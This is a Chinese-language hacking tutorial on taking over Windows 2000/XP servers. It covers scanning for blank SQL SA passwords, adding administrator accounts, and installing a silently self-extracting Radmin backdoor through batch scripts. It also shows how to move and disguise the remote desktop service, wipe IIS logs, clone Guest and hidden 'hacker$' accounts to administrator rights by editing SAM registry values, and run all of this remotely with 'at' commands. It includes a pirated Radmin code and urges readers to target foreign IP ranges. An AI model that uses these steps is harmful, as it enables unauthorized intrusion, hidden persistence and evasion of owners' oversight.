工具:WINNTAutoAttack自動(dòng)攻擊器(掃漏洞)
SQLTOOLS(SA空口令連接器)
RAMDIN影子3.0中文版(遠(yuǎn)程控制程序)
RADMIN注冊(cè)碼:
08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23
SC.exe port.bat query.exe quser.exe(隱藏3389服務(wù)及不讓管理發(fā)現(xiàn)自己程序)
CleanIISLog.exe(小榕的擦PP程序)
3389.exe(開3389端口服務(wù)的)
psu.exe(使用被禁止的Guest帳戶要用到的)
mstsc.exe(遠(yuǎn)程桌面連接程序)
下載(點(diǎn)右鍵用下載工具下)
一.掃到SA弱口令..(自動(dòng)攻擊器)
二.用SQLTOOLS連上去建一個(gè)用戶
net start telnet 開telnet服務(wù)
net user mint mint /add 添加用戶mint密碼為mint
net localgroup administrators mint /add 將帳號(hào)mint升級(jí)為管理員
三.上傳后門程序RAD.EXE(RADMIN服務(wù)端自解壓程序)
制作RAD.EXE過(guò)程:
1、到Radmin安裝目錄下找到AdmDll.dll、 raddrv.dll和r_sever.exe(從新
2、在本地設(shè)置服務(wù)端(一定要生成)
設(shè)置密碼-->>設(shè)置連接端口(默認(rèn)4489)-->>生成
3、導(dǎo)出注冊(cè)表HKEY_LOCAL_MACHINE\SYSTEM\Radmin的鍵值為1.reg
4、編寫一個(gè)批處理,并命名為u.bat
--------------------------------------------
@echo off
net stop r_server
--------------------------------------------
5、寫第二個(gè)批處理,r.bat,內(nèi)容為
--------------------------------------------
@echo off
@Explorer.exe /uninstall /silence
@Explorer.exe /install /silence
@regedit /s 1.reg
@echo off
@Explorer.exe /uninstall /silence
@Explorer.exe /install /silence
@regedit /s 1.reg
@net start r_server
@del rad.exe
@del 1.reg
@del r.bat
@del u.bat
--------------------------------------------
6、將AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat壓縮成Rad.RAR壓縮包
7、將Rad.rar制作成自解壓文件.
選擇Default.sfx的自釋放模塊-->>高級(jí)自釋放選項(xiàng)
-->>常規(guī)
釋放路徑:%systemroot%\system32
安裝程序:釋放后運(yùn)行:r.bat 釋放前運(yùn)行u.bat
-->>摸式
緘默模式:全部隱藏 覆蓋方式:覆蓋所有文件
-->>確定-->>確定
生成完成
四.用RADMIN客服端連接....
上傳文件到c:\WINNT(XP是windows):
port.bat(如果是在XP下..這個(gè)要把里面的WINNT改為Windows)
query.exe quser.exe
SC.exe
CleanIISLog.exe.exe
3389.exe
psu.exe
最好再上傳一個(gè)反彈后門
RADMIN進(jìn)入TELNET
運(yùn)行 c:\winnt\3389.exe
重啟肉雞
五.重啟后用遠(yuǎn)程桌面遠(yuǎn)程器連上去
這里就有時(shí)會(huì)出現(xiàn)個(gè)問題..
使用3389登陸。發(fā)現(xiàn)登陸用戶已滿。不用怕。我們把他踢出去。
telnet對(duì)方ip。發(fā)現(xiàn)需要NTLM 身份驗(yàn)證。
我們?cè)谧约旱碾娔X里建立一個(gè)帳號(hào)mint密碼為mint身份為管理員。
找到c:\winnt\system32\cmd.exe 建立一個(gè)快捷方式到桌面。
修改cmd的快捷方式屬性為允許其他身份登陸。
然后運(yùn)行桌面上的cmd.exe的快捷方式。輸入帳號(hào)mint密碼mint
telnet對(duì)方ip.直接可以登陸對(duì)方電腦了。
使用命令
c:\query user (查看對(duì)方目前終端登陸狀況。)
運(yùn)行命令
c:\logoff 1(踢出去一個(gè)管理者)
再用c:\query user檢查一便~~(這就是為什么不馬上用1.bat了)
六.連上后..在cmd下運(yùn)行
c:\winnt\log . 自己的IP .(擦PP)
c:\winnet\1.bat (刪除覆蓋查看當(dāng)前在線用戶文件)
七.打SA空口令補(bǔ)丁
程序-->>Microsoft SQL Server-->>查詢分析器(有放大鏡的)
-->>Windowst身位驗(yàn)證登陸
復(fù)制一下代碼:SELMIS
--------------------------------------------
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
--------------------------------------------
按F5(運(yùn)行)
關(guān)了退出SQL Server再用SQL Server身位驗(yàn)證進(jìn)一次.退出(這是為了不留下記錄)
八.改3389端口和服務(wù)名稱
修改服務(wù)器端的端口設(shè)置 ,注冊(cè)表有2個(gè)地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值,默認(rèn)是3389,選擇10進(jìn)制 修改成所希望的端口,比如1314
第二個(gè)地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber值,默認(rèn)是3389,選擇10進(jìn)制 修改成所希望的端口,比如1314
要重啟系統(tǒng)才能用新端口連.(不急..改了他的服務(wù)名再重啟系統(tǒng)吧)
導(dǎo)出3389服務(wù)的
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
的鍵值為mm.reg文件.
編輯mm.reg文件.替換TermService為Alerter(錯(cuò)誤警告服務(wù)..別的服務(wù)也行)
再把第十行的"Description"="(這里是服務(wù)說(shuō)明..改為你所換的服務(wù)說(shuō)明..這里改為通知所選用戶和計(jì)算機(jī)有關(guān)系統(tǒng)管理級(jí)警報(bào)。)"
第十一行的"DisplayName"="(這里是服務(wù)名稱..改為你所換的服務(wù)名稱..這里改為Alerter)
保存..再導(dǎo)入注冊(cè)表(這里要先運(yùn)行Services.msc(可在CMD下打這命令)服務(wù)管理器..把Alerter的服務(wù)先停止)
再在CMD下
CD c:\winnt\system32
copy termsrv.exe service.exe(這里是復(fù)制termsrv.exe為Alerter服務(wù)文件名差不多的文件)
CD C:\winnt
sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe(這里是從新定向Alerter服務(wù)文件.服務(wù)名一定要區(qū)分大小寫A要大寫)
九.注消后(注消比直接關(guān)要好些)..用Radmin重啟肉雞..
十.使用被禁用的帳戶[Guest]登陸.刪除自己開始建的帳號(hào)
1.使用psu.exe展開注冊(cè)表到
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
用法:[psu -p regedit -i pid]
Pid 的值為在任務(wù)欄空白處點(diǎn)右鍵-->>任務(wù)管理器--->>進(jìn)程中的winlogon.exe后面的數(shù)值就是PID數(shù)值
如:psu -p regedit -i 157
將Guest克成管理員權(quán)限
克成管理員權(quán)限的方法:
找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator的類型值.
在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\下找到這個(gè)類型值在復(fù)制數(shù)值名為F的數(shù)值數(shù)劇覆蓋相應(yīng)的Guest的類型值(找的方法一樣)
導(dǎo)出Guest的配置(也就是導(dǎo)出HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Guest和他相應(yīng)的類型值的數(shù)據(jù)) 然后刪除Guest的配置
2.查看計(jì)算機(jī)管理中帳戶列表 刷新這時(shí)候會(huì)出現(xiàn)錯(cuò)誤[找不到帳戶](跳過(guò)這步也行)
3.將Guest的配置(二個(gè)REG文件導(dǎo)進(jìn)注冊(cè)表)
4.修改Guest帳戶密碼,命令行下禁用Guest帳戶[一定是命令行下]
net user Guest **** [修改密碼]
net user Guest /active:yes
net user Guest /active:no[命令行下禁用Guest]
5.實(shí)驗(yàn)被禁止的帳戶Guest是否可用.
6.用Guest登陸后刪除自己建的帳號(hào)
net user mint /del
整個(gè)過(guò)程結(jié)束
最后最好把RADMIN的服務(wù)也改了..多留個(gè)后門多條路..呵呵
整個(gè)過(guò)程全部結(jié)束..這機(jī)子就真正變成你的肉雞了...
文章里面的內(nèi)容都是以下動(dòng)畫的內(nèi)容(通過(guò)我自己的理解寫的..也許存在許多錯(cuò)誤..希望對(duì)和偶一樣的菜鳥有幫助)
笑語(yǔ)☆嫣然的《終結(jié)3389》
mervin制作 <《終結(jié)3389》補(bǔ)充版>
孤狼望月 <使用被禁用的帳戶[Guest]登陸>
(他還有個(gè)(隱藏帳號(hào)后門教程)也差不多)
碎片 <Radmin服務(wù)端最新配置方法>
最后送一個(gè)找固定IP肉雞的方法:
菜菜鳥教程之-如何提高掃描到肉雞的機(jī)會(huì) BY:網(wǎng)絡(luò)凡人
先找個(gè)有不正常端口的代理,代理我一般到網(wǎng)迷之家(www.52cyq.com)拿的。就這個(gè)好了
218.58.88.15:45576 [山東省 青島市](我的是教育網(wǎng),掃描不到國(guó)外的機(jī)的,所以用國(guó)內(nèi)的IP來(lái)
做試范),我把它擴(kuò)充了整一個(gè)網(wǎng)段。由218.58.88.1-218.58.88.255你可以擴(kuò)充成218.58.80.1-
218.58.90.255 .端口為了減少動(dòng)畫的大小,就掃描3389好了,。IP擴(kuò)充多少就要看你
的網(wǎng)快還是慢。快的就擴(kuò)充多點(diǎn),慢的只掃描一個(gè)c段IP好了。看到?jīng)]有,[218.58.88.8]:
發(fā)現(xiàn) NT-Server弱口令: Administrator/[空口令]就是這么簡(jiǎn)單就可以掃描到肉雞的,記得,
我這里出不了國(guó)外,才掃描國(guó)內(nèi)的機(jī)。你們掃描國(guó)外的機(jī),不要掃描國(guó)內(nèi)的機(jī)啊~
如果發(fā)生了什么事,公安會(huì)找你的哦。好了。掃描就說(shuō)到這了。
、假設(shè)我們是以超級(jí)用戶administrator登錄到開有終端服務(wù)的肉雞上的,首先在命令行下或帳戶管理器中建立一個(gè)帳戶:hacker$,這里我在命令行下建立這個(gè)帳戶
net user hacker$ 1234 /add
2、在開始/運(yùn)行中輸入:regedt32.exe并回車來(lái)運(yùn)行regedt32.exe。
3、點(diǎn)"權(quán)限"以后會(huì)彈出窗口
點(diǎn)添加將我登錄時(shí)的帳戶添加到安全欄內(nèi),這里我是以administrator的身份登錄的,所以我就將administrator加入,并設(shè)置權(quán)限為"完全控制"。這里需要說(shuō)明一下:最好是添加你登錄的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會(huì)帶來(lái)一系列不必要的問題。等隱藏超級(jí)用戶建好以,再來(lái)這里將你添加的帳戶刪除即可。
4、再點(diǎn)"開始"→"運(yùn)行"并輸入"regedit.exe" 回車,啟動(dòng)注冊(cè)表編輯器regedit.exe。
打開鍵:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$"
5、將項(xiàng)hacker$、00000409、000001F4導(dǎo)出為hacker.reg、409.reg、1f4.reg,用記事本分別打這幾個(gè)導(dǎo)出的文件進(jìn)行編輯,將超級(jí)用戶對(duì)應(yīng)的項(xiàng)000001F4下的鍵"F"的值復(fù)制,并覆蓋hacker$對(duì)應(yīng)的項(xiàng)00000409下的鍵"F"的值,然后再將00000409.reg與hacker.reg合并。
6、在命令行下執(zhí)行net user hacker$ /del將用戶hacker$刪除:net user hacker$ /del
7、在regedit.exe的窗口內(nèi)按F5刷新,然后打文件-導(dǎo)入注冊(cè)表文件將修改好的hacker.reg導(dǎo)入注冊(cè)表即可
8、到此,隱藏的超級(jí)用戶hacker$已經(jīng)建好了,然后關(guān)閉regedit.exe。在regedt32.exe窗口內(nèi)把HKEY_LOCAL_MACHINE\SAM\SAM鍵權(quán)限改回原來(lái)的樣子(只要?jiǎng)h除添加的帳戶administrator即可)。
9、注意:隱藏的超級(jí)用戶建好后,在帳戶管理器看不到hacker$這個(gè)用戶,在命令行用"net user"命令也看不到,但是超級(jí)用戶建立以后,就不能再改密碼了,如果用net user命令來(lái)改hacker$的密碼的話,那么在帳戶管理器中將又會(huì)看這個(gè)隱藏的超級(jí)用戶了,而且不能刪除。
如何在命令行下遠(yuǎn)程建立隱藏的超級(jí)用戶
在這里將用at的命令,因?yàn)橛胊t產(chǎn)生的計(jì)劃任務(wù)是以系統(tǒng)身份運(yùn)行的,所以也用不到psu.exe程序。為了能夠使用at命令,肉雞必須開有schedule的服務(wù),如果沒有開啟,可用流光里帶的工具netsvc.exe或sc.exe來(lái)遠(yuǎn)程啟動(dòng),當(dāng)然其方法也可以,只要能啟動(dòng)schedule服務(wù)就行。
對(duì)于命令行方式,你可以采用各種連接方式,如用SQLexec連接MSSQL的1433端口,也可以用telnet服務(wù),只要以你能得到一個(gè)cmdshell,并且有運(yùn)行at命令的權(quán)限就可以。
1、首先找到一臺(tái)肉雞,至于如何來(lái)找那不是我這里所說(shuō)的話題。這里先假設(shè)找到一臺(tái)超級(jí)用戶為administrator,密碼為12345678的肉雞,現(xiàn)在我們開始在命令行下遠(yuǎn)程為它建立隱藏的超級(jí)用戶。(例子中的主機(jī)是我的局域網(wǎng)內(nèi)的一臺(tái)主機(jī),我將它的ip地址改為13.50.97.238,,請(qǐng)勿在互聯(lián)網(wǎng)上對(duì)號(hào)入座,以免騷擾正常的ip地址。)
2、先與肉雞建立連接,命令為: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator
3、用at命令在肉雞上建立一個(gè)用戶(如果at服務(wù)沒有啟動(dòng),可用小榕的netsvc.exe或sc.exe來(lái)遠(yuǎn)程啟動(dòng)):at \\13.50.97.238 12:51
c:\winnt\system32\net.exe user hacker$ 1234 /add
建立這個(gè)加有$符的用戶名,是因?yàn)榧佑?符后,命令行下用net user將不顯示這個(gè)用戶,但在帳戶管理器卻能看到這個(gè)用戶。
4、同樣用at命令導(dǎo)出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下鍵值:at \\13.50.97.238 12:55
c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\
/e 是regedit.exe的參數(shù),在_LOCAL_MACHINE\SAM\SAM\Domains\account\users\這個(gè)鍵的一定要以\結(jié)尾。必要的情況下可以用引號(hào)將"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\"引起來(lái)。
5、將肉雞上的hacker.reg下載到本機(jī)上用記事本打開進(jìn)行編輯命令為:copy \\13.50.97.238\admin$\system32\hacker.reg
c:\hacker.reg
修改的方法圖形界中已經(jīng)介紹過(guò)了,這里就不作介紹了。
6、再將編輯好的hacker.reg拷回肉雞上 copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg
7、查看肉雞時(shí)間:net time \\13.50.97.238 然后用at命令將用戶hacker$刪除:
at \\13.50.97.238 13:40 net user hacker$ /del
8、驗(yàn)證hacker$是否刪除:用
net use \\13.50.97.238 /del 斷開與肉雞的連接。
net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" 用帳戶hacker$與肉雞連接,不能連接說(shuō)明已刪除。
9、再與肉雞建立連接:net use \\13.50.97.238\ipc$ "12345678" /user:"administrator"
再取得肉雞時(shí)間,用at命令將拷回肉雞的hacker1.reg導(dǎo)入肉雞注冊(cè)表:
at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg
regedit.exe的參數(shù)/s是指安靜模式。
10、再驗(yàn)證hacker$是否已建立,方法同上面驗(yàn)證hacker$是否被刪除一樣。
11、再驗(yàn)證用戶hacker$是否有讀、寫、刪的權(quán)限,如果不放心,你還可驗(yàn)證是否能建立其它帳戶。
12、通過(guò)11可以斷定用戶hacker$具有超級(jí)用戶權(quán)限,因?yàn)樽畛跷矣胊t命令建立它的時(shí)候是一個(gè)普通用戶,而現(xiàn)在卻具有遠(yuǎn)程讀、寫、刪的權(quán)限。
三、如果肉雞沒有開3389終端服務(wù),而我又不想用命令行,怎么辦?
這種情況下,你也可以用界面方式來(lái)遠(yuǎn)程為肉雞建立隱藏的超級(jí)用戶。因?yàn)閞egedit.exe、regedt32.exe都有連接網(wǎng)絡(luò)注冊(cè)表的功能,你可以用regedt32.exe來(lái)為遠(yuǎn)程主機(jī)的注冊(cè)表項(xiàng)設(shè)置權(quán)限,用regedit.exe來(lái)編輯遠(yuǎn)程注冊(cè)表。帳戶管理器也有一項(xiàng)連另一臺(tái)計(jì)算機(jī)的功能,你可以用帳戶管理器為遠(yuǎn)程主機(jī)建立和刪除帳戶。具體步聚與上面介紹的相似,我就不多說(shuō)了,只它的速度實(shí)在是令人難以忍受。
但是這里有兩個(gè)前提:1、先用net use \\肉雞ip\ipc$ "密碼" /user:"超級(jí)用戶名"來(lái)與遠(yuǎn)程主機(jī)建立連接以后,才能用regedit.exe regedt32.exe及帳戶管理器與遠(yuǎn)程主機(jī)連接。
2、遠(yuǎn)程主機(jī)必須開啟遠(yuǎn)程注冊(cè)表服務(wù)(沒有開啟的話,你也可以遠(yuǎn)程開啟,因?yàn)槟阌谐?jí)用戶的密碼了)。
四、利用被禁用的帳戶建立隱藏的超級(jí)用戶:
我們可以用肉雞上被禁止的用戶來(lái)建立隱藏的超組用戶.方法如下:
1.想辦法查看有哪些用戶被細(xì)心的管理員禁止,一般情況下,有些管理員出于安全考慮,通常會(huì)將guest禁用,當(dāng)然了會(huì)禁用其它用戶。在圖形界面下,非常容易,只要在帳戶管理器中就可以看到被禁用的帳戶上有一個(gè)紅叉;而在命令行下,我還沒有想到好的辦法,只能在命令行下用命令:"net user 用戶名"一個(gè)一個(gè)來(lái)查看用戶是否被禁用。
2.在這里,我們假設(shè)用戶hacker被管理員禁用。首先,我先用小榕的超組用戶克隆程序CA.exe,將被禁用的用戶hacker 克隆成超級(jí)用戶(克隆之后,被禁用的用戶hacker就會(huì)自動(dòng)被激活了): CA.EXE \\肉雞ip Administrator 超級(jí)用戶密碼 hacher hacher密碼。
3.如果你現(xiàn)在一個(gè)cmdshell,如利用telnet服務(wù)或SQLEXEC連接肉雞的msSQL的默認(rèn)端口1433得到的shell都可以,這時(shí)你只要輸入命令:
net user hacker /active:no 這樣用戶hacker就被禁用了(至少表面上是這樣的),當(dāng)然你也可以將用戶hacher換成其它的被禁用的用戶。
4.這時(shí)如果你在圖形界面下看帳戶管理器中的用戶時(shí),會(huì)發(fā)現(xiàn)用戶hacker被禁用了,但事實(shí)上是這樣的嗎?你用這個(gè)被禁用的用戶連接一下肉雞看看是否能連上?用命令:net user \\肉雞ip\ipc$ "hacker密碼" /user:"hacker" 連一連看看。我可以告訴大家,經(jīng)過(guò)我多次試驗(yàn),次次都能成功,而且還是超級(jí)用戶權(quán)限。
5.如果沒有cmdshell怎么辦?你可以我上面介紹的at命令來(lái)禁用用戶hacker;命令格式:at \\肉雞ip 時(shí)間 net user hacker /active:no
6.原理:具體的高深的原理我也說(shuō)不上來(lái),我只能從最簡(jiǎn)單的說(shuō)。你先在圖形界面下在帳戶管理器中禁用一下超級(jí)用戶administrator看看,肯定會(huì)彈出一對(duì)話框,并禁止你繼續(xù)禁用超級(jí)用戶administrator,同樣,因?yàn)樵诳寺r(shí),hacker在注冊(cè)表的"F"鍵被超級(jí)用戶administrator在注冊(cè)表的"F"鍵所替代,因而hacker就具有了超級(jí)用戶的權(quán)限了,但是由于hacker在注冊(cè)表內(nèi)"C"健還是原來(lái)的"C"鍵,所以hacker還是會(huì)被禁用,但是它的超級(jí)用戶權(quán)限卻不會(huì)被禁用,因此被禁用的用戶hacker還是可以連接肉雞,而且還具有超級(jí)用戶的權(quán)限。具體我也說(shuō)不明白,大家權(quán)且這么理解吧。
五、注意的幾點(diǎn)事項(xiàng):
1、隱藏的超級(jí)用戶建立以后,在帳戶管理器中和命令行下均看不到這個(gè)用戶,但這個(gè)用戶卻存在。
2、隱藏的超級(jí)用戶建立以后,就不能再修改密碼了,因?yàn)橐坏┬薷拿艽a,這個(gè)隱藏的超級(jí)用戶就會(huì)暴露在帳戶管理器中,而且不能刪除。
3、如在本機(jī)上試驗(yàn)時(shí),最好用系統(tǒng)自帶的備份工具先備份好本機(jī)的"系統(tǒng)狀態(tài)"主要是注冊(cè)表的備份,因?yàn)楸救俗鲈囼?yàn)時(shí),曾出現(xiàn)過(guò)帳戶管理器中看不到任何用戶,組中也看不到任何組的現(xiàn)象,但它們卻存在。幸好我有備份,呵呵。SAM鍵是畢竟系統(tǒng)最敏感的部位。
4、本方法在2000/XP上測(cè)試通過(guò),未在NT上測(cè)試。本方法僅供研究,請(qǐng)勿將本方法用于破壞上,利用本方法造成嚴(yán)重后果者,由使用者負(fù)責(zé),本人概不負(fù)責(zé)。